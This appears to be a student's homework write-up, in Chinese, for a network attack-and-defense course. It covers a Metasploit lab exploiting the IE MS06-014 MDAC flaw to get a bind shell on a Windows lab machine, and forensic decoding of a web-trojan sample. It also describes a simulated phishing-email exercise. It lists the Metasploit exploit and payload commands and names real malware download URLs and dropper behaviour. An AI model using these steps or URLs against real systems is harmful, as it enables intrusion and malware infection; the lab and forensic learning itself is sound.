20242801 2024-2025-2 《网络攻防实践》第11次作业

20242801 2024-2025-2 《网络攻防实践》第11次作业

一、实验内容

1. web浏览器渗透攻击

​ 使用攻击机和Windows靶机进行浏览器渗透攻击实验,体验网页木马构造及实施浏览器攻击的实际过程。

  • 选择使用Metasploit中的MS06-014渗透攻击模块

  • 选择PAYLOAD为任意远程Shell连接

  • 设置服务器地址和URL参数,运行exploit,构造出恶意网页木马脚本

  • 在靶机环境中启动浏览器,验证与服务器的连通性,并访问而已网页木马脚本URL

  • 在攻击机的Metasploit软件中查看渗透攻击状态,并通过成功渗透攻击后建立起的远程控制会话SESSION,在靶机上远程执行命令

2. 取证分析实践—网页木马攻击场景分析

3. 攻防对抗实践—web浏览器渗透攻击攻防

​ 攻击方使用Metasploit构造出至少两个不同Web浏览端软件安全漏洞的渗透攻击代码,并进行混淆处理之后组装成一个URL,通过具有欺骗性的电子邮件发送给防守方。

​ 防守方对电子邮件中的挂马链接进行提取、解混淆分析、尝试恢复出渗透代码的原始形态,并分析这些渗透代码都是攻击哪些Web浏览端软件的哪些安全漏洞。

二、实验过程

(一) web浏览器渗透攻击

1、配置实验环境

​ 分别使用kali和win2kserver作为攻击机和靶机,两者ip地址如下:

​ 并且两者可以正常连通。

2、使用metasploit进行渗透实验

​ 在kali中输入msfconsole,打开matesploit。

​ 输入use exploit/windows/browser/ie_createobject,将CVE-2006-0003作为目标漏洞;然后,输入set payload windows/shell/bind_tcp,设置Payload为任意TCP连接;最后,输入set URIPATH /,设置URIPATH为根路径。

​ 配置完成,exploit!

​ 将生成的连接192.168.5.12:8080输入到winserver浏览器中打开。

​ 然后,在msfconsole中输入命令session -i 1即可获取靶机的shell。

(二)取证分析实践网页木马攻击场景分析

​ 打开start.html,搜索关键词htm,可以看到有一个iframe调用了new09.htm。

​ 然后,我们打开new09.htm文件,可以看到该文件进一步调用了http://aa.18dd.net/aa/kl.htm和http://js.users.51.la/1299644.js。

​ 然后,我们计算这两个链接的md5值。

​ 根据计算出来的md5值在hashed文件夹中寻找是否存在相关文件。

​ 之后,我们打开original文件夹,对其中的kl.htm和1299644.js进行分析。其中,1299644.js文件中只有一段注释。

​ 在kl.htm文件中,发现了一个变量t和对应的解密方法。由此,我们使用base64对t进行解码,再使用xxtea进行解密,最后将其转化为字符串形式。

​ 我们使用ai将其中多余的空格都去掉,然后分析代码,我们发现,这段代码分别利用率微软数据库访问对象、暴风影音、PPStream和百度搜霸的漏洞,并引用了http://aa.18dd.net/aa/1.js 、 http://aa.18dd.net/aa/b.jshttp://aa.18dd.net/aa/pps.js 和一个Windows压缩包文件 http://down.18dd.net/bb/bd.cab。

​ 然后,我们分别计算这四个url的md5值,并找到对应文件进行分析。

​ 首先,对1.js文件进行解码,可以发现,该文件下载了一个http://down.18dd.net/bb/014.exe文件,然后利用ADODB漏洞执行了cmd.exe .\ntuser.com命令。

​ 然后我们对b.js文件及进行解压,然后交给ai整理代码。

​ 参照之前学长的方法,我们把函数的执行结果输出到body标签中,然后我们交给ai,整理代码

​ 解码后可以得到关键字符串,GetProcAddress、GetSystemDirectoryA 、WinExec 、ExitThread、LoadLibraryA、urlmon、URLDownloadToFileA和 http://down.18dd.net/bb/pps.exe。由此可知,代码下载了http://down.18dd.net/bb/pps.exe。解压bd.cab文件后得到bd.exe。

​ 然后计算014.exe,bf.exe、pps.exe和bd.exe的md5值。

​ 可以发现他们的md5值相同,这些文件是同一份文件。

​ 然后,我们使用PEID查看文件的相关信息,可以观察到这份文件是使用Delphi进行编写的。

​ 最后,我们使用IDA pro打开其中上述四个中任意一份,查看其中的string信息。

​ 可以发现,这份文件依次下载了0.exe-19.exe等20个文件,生成了一个Autorun脚本,使用其打开了IE浏览器。最后,还是用cmd /c date 1981-01-12修改了系统的日期。

(三) 攻防对抗实践—web浏览器渗透攻击攻防

1、攻击方(20242801)

​ 在此我们使用kali中的metasploit中的MS06-014 Microsoft Windows MDAC漏洞,构建了一封木马邮件。

​ 然后,把邮件发送给防守方,等待防守方打开邮件,点击链接。

2、防守方(20241901)

​ 由于是模拟实验,防守方在点击前打开wireshark监听流量。

​ 然后,点击邮箱链接,在浏览器中查看源代码。

​ 将代码复制到ai中进行整理,可以发现成功启用了MS06-014漏洞。

​ 最后,我们在kali中回车输入session -i 1,即可获取防守方的shell,victory!

三、学习感悟

  1. 通过本次实验,了解了浏览器攻击的基本概念和流程,进一步熟悉了使用metasploit进行渗透攻击的方法。同时,学习了网页木马攻击的取证分析方法,感觉本次实验难度还是比较大的,通过查找大量网上的资料并和同学进行交流才把这次实验完成,收获也很大。
  2. 本次学习的完整录屏视频已上传至百度网盘(时间较长文件较大),通过网盘分享的文件:第十一次作业
    链接: https://pan.baidu.com/s/1jW41QrxSSsiiI0VHOuEirA?pwd=1234 提取码: 1234
posted @ 2025-06-03 17:00  Shallwe741  阅读(68)  评论(0)    收藏  举报